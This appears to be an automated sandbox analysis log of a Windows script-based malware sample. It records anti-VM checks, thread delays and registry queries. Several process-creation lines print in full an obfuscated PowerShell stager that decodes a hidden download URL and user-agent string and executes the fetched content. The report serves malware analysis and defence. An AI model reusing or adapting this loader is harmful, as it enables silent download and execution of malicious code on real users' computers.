Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3770 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6098 Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 2072 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5884 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wscript.exe, 00000000.00000002.1375520650.0000013D6CFD0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.1372110678.0000013D6D2C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000002.00000002.1530394780.000001C5ECC94000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW$D%SystemRoot%\system32\mswsock.dllDeliM sildeGavebt Bomba pre,lProdul Medli TrstfOutpoaEduc cPlesktFootsu D ferCompleRefer.Spin,DPanscoMultiw PercnWindslBevbnoEpictaungdodTjeneF Edr ichabolUndereSlagb(Sub,e$FaenoTischirButo,nunireg PlejeBegrunNonskdAffe.eCutar
Source: wscript.exe, 00000000.00000003.1371981845.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1365525218.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1364056176.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1375690007.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1363491376.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373454782.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1363852731.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1370814268.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW5:HN
Source: wscript.exe, 00000000.00000003.1372256990.0000013D6B1A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\(
Source: wscript.exe, 00000000.00000002.1375520650.0000013D6CFD0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: wscript.exe, 00000000.00000003.1371981845.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1363955829.0000013D6D29D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1365525218.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373978374.0000013D6D2C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1364056176.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1375690007.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1375982993.0000013D6D2C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1363491376.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373454782.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1371739261.0000013D6D2C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1363852731.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i Erkl Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cabassou.Tun && echo $" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$epidydimus = 1;$painters21='substrin';$painters21+='g';function antimeningococcic($gejstligt){$nosher=$gejstligt.length-$epidydimus;for($antisnapper=5; $antisnapper -lt $nosher; $antisnapper+=(6)){$taxmen+=$gejstligt.$painters21.invoke($antisnapper, $epidydimus);}$taxmen;}function cairned($fremvisningen){. ($chantors) ($fremvisningen);}$veteraness=antimeningococcic 'manitmneph,onringzregili.hiotlaspirlmet.raklis,/ un.e5svam,. afvi0bryde hjlp(thundwfemmlikoo.dnservidalkohovetuswglaiestaare ttslunddfdstovern erhve1ambas0 vatp.therm0quito;caul nonl wlinieire,ubncarah6feabe4finia;malac .apeixl,lla6re,ro4ungar;pre.n notergastrvagmas:bazzi1tr.me2 neph1spe,l.n ter0sev.r)velve reprig celievasalcchon.kpampaorecta/okkup2prs,r0radom1entoc0vov,d0nonst1hemag0,aama1 ksam familfudadriridgir notcech.llfcenoso .rorxcoons/ warn1f.mte2skede1udgif.ties.0solip ';$maskinafdelinger=antimeningococcic 'indviu,ablesdominebrou,r blok-tabifanuculgseksee ,ccenhandbtoutbu ';$trngendes=antimeningococcic ' alpehdurditafbryttagliphabilskal,i:super/dee,d/feticd showr cymoilokalvreheae lant. tvrfg tjsvo flado resogse,iclsaf,aespiro.lnpolc gillonive muntan/c vilupate cwa,tr?smelteconquxsp itpsta,doservir o.ert ramp=boldhdgeon.ogriotw indkntromllaffreo diskaudmand.orti&phyllide.rwdtaint=nonp,1 pinn0inddanaktivj larmvkoombwcatalcbn.elqag.ip2 undeq kos knonrem.anscz eddyzminiakarticlafkogk poveaardeam wisex,alinzvenge6epit tpenge1recla5,entrjvek,ltlevnep nder2 glycrvinhakraakrbsamfuhpont. ';$skulapstavs=antimeningococcic 'delig>crash ';$chantors=antimeningococcic 'flymeimasonehash.xshei ';$anniversariness = antimeningococcic 'no.mae sta,cbassoh.gpaaoudv.k symp% wi,das,mfupmisr,pmedendha niasystetoverfamotst% .ryd\badescant.cabe alb .esaa,repsshuskesmalguoforesuevolu.fungitstatsupoundnopst palae&disku&chain cretaeradiocsarcohbegrao arar anato$divis ';cairned (antimeningococcic 'unim $afvu,ghenk,love eogallib preaaexinglhilbe:llebrt,entrofort s pahacoversaramifn ana aomski=tor i(antalcac.mpmideendtalel nylon/rif,ec vamb korru$ agara sychnwinten phoniho otvdeltaerudelravilasg lioa,kalmrbastkiaa,eknsol.refortrsblocks .agr)subpr ');cairned (antimeningococcic ' oshy$moblegs.kofl fac,o vocabtrst akonomlpipin:,elchltidssycellano,iefn for ebrnd dsynodssaddela.iata,orbrgrevesepreasngaranedesi.s anjo1sku k6black=affal$ kommtsae nre,astnnedrigailuregodsen.rypad terreldigesunref.bjergsek,popjorddla retistrantmanag(cuber$b gaescarlyk counu r,tulslacka triapfucusslancetlampeaneutrvsa mestral.)septa ');$trngendes=$lynnedslagenes16[0];cairned (antimeningococcic '.ubgo$episkgin.asl ,tamosuprab infoa.esoelthe,r:fniscm.echaeopkrvtaeratakretslh,elclgaussisub efregalaric.icsh oott.geru.irkerbeco e anar= afg nforgre dryrwauric-anlg oam hibtangajfs,ebe amulchvalptgroun friedst nefyforfasengratblodmethrummortho. aludnpropoedomsttpa ad.agouawjobb efletsbsamlic appllchis.i erkl
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$epidydimus = 1;$painters21='substrin';$painters21+='g';function antimeningococcic($gejstligt){$nosher=$gejstligt.length-$epidydimus;for($antisnapper=5; $antisnapper -lt $nosher; $antisnapper+=(6)){$taxmen+=$gejstligt.$painters21.invoke($antisnapper, $epidydimus);}$taxmen;}function cairned($fremvisningen){. ($chantors) ($fremvisningen);}$veteraness=antimeningococcic 'manitmneph,onringzregili.hiotlaspirlmet.raklis,/ un.e5svam,. afvi0bryde hjlp(thundwfemmlikoo.dnservidalkohovetuswglaiestaare ttslunddfdstovern erhve1ambas0 vatp.therm0quito;caul nonl wlinieire,ubncarah6feabe4finia;malac .apeixl,lla6re,ro4ungar;pre.n notergastrvagmas:bazzi1tr.me2 neph1spe,l.n ter0sev.r)velve reprig celievasalcchon.kpampaorecta/okkup2prs,r0radom1entoc0vov,d0nonst1hemag0,aama1 ksam familfudadriridgir notcech.llfcenoso .rorxcoons/ warn1f.mte2skede1udgif.ties.0solip ';$maskinafdelinger=antimeningococcic 'indviu,ablesdominebrou,r blok-tabifanuculgseksee ,ccenhandbtoutbu ';$trngendes=antimeningococcic ' alpehdurditafbryttagliphabilskal,i:super/dee,d/feticd showr cymoilokalvreheae lant. tvrfg tjsvo flado resogse,iclsaf,aespiro.lnpolc gillonive muntan/c vilupate cwa,tr?smelteconquxsp itpsta,doservir o.ert ramp=boldhdgeon.ogriotw indkntromllaffreo diskaudmand.orti&phyllide.rwdtaint=nonp,1 pinn0inddanaktivj larmvkoombwcatalcbn.elqag.ip2 undeq kos knonrem.anscz eddyzminiakarticlafkogk poveaardeam wisex,alinzvenge6epit tpenge1recla5,entrjvek,ltlevnep nder2 glycrvinhakraakrbsamfuhpont. ';$skulapstavs=antimeningococcic 'delig>crash ';$chantors=antimeningococcic 'flymeimasonehash.xshei ';$anniversariness = antimeningococcic 'no.mae sta,cbassoh.gpaaoudv.k symp% wi,das,mfupmisr,pmedendha niasystetoverfamotst% .ryd\badescant.cabe alb .esaa,repsshuskesmalguoforesuevolu.fungitstatsupoundnopst palae&disku&chain cretaeradiocsarcohbegrao arar anato$divis ';cairned (antimeningococcic 'unim $afvu,ghenk,love eogallib preaaexinglhilbe:llebrt,entrofort s pahacoversaramifn ana aomski=tor i(antalcac.mpmideendtalel nylon/rif,ec vamb korru$ agara sychnwinten phoniho otvdeltaerudelravilasg lioa,kalmrbastkiaa,eknsol.refortrsblocks .agr)subpr ');cairned (antimeningococcic ' oshy$moblegs.kofl fac,o vocabtrst akonomlpipin:,elchltidssycellano,iefn for ebrnd dsynodssaddela.iata,orbrgrevesepreasngaranedesi.s anjo1sku k6black=affal$ kommtsae nre,astnnedrigailuregodsen.rypad terreldigesunref.bjergsek,popjorddla retistrantmanag(cuber$b gaescarlyk counu r,tulslacka triapfucusslancetlampeaneutrvsa mestral.)septa ');$trngendes=$lynnedslagenes16[0];cairned (antimeningococcic '.ubgo$episkgin.asl ,tamosuprab infoa.esoelthe,r:fniscm.echaeopkrvtaeratakretslh,elclgaussisub efregalaric.icsh oott.geru.irkerbeco e anar= afg nforgre dryrwauric-anlg oam hibtangajfs,ebe amulchvalptgroun friedst nefyforfasengratblodmethrummortho. aludnpropoedomsttpa ad.agouawjobb efletsbsamlic appllchis.i erkl Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs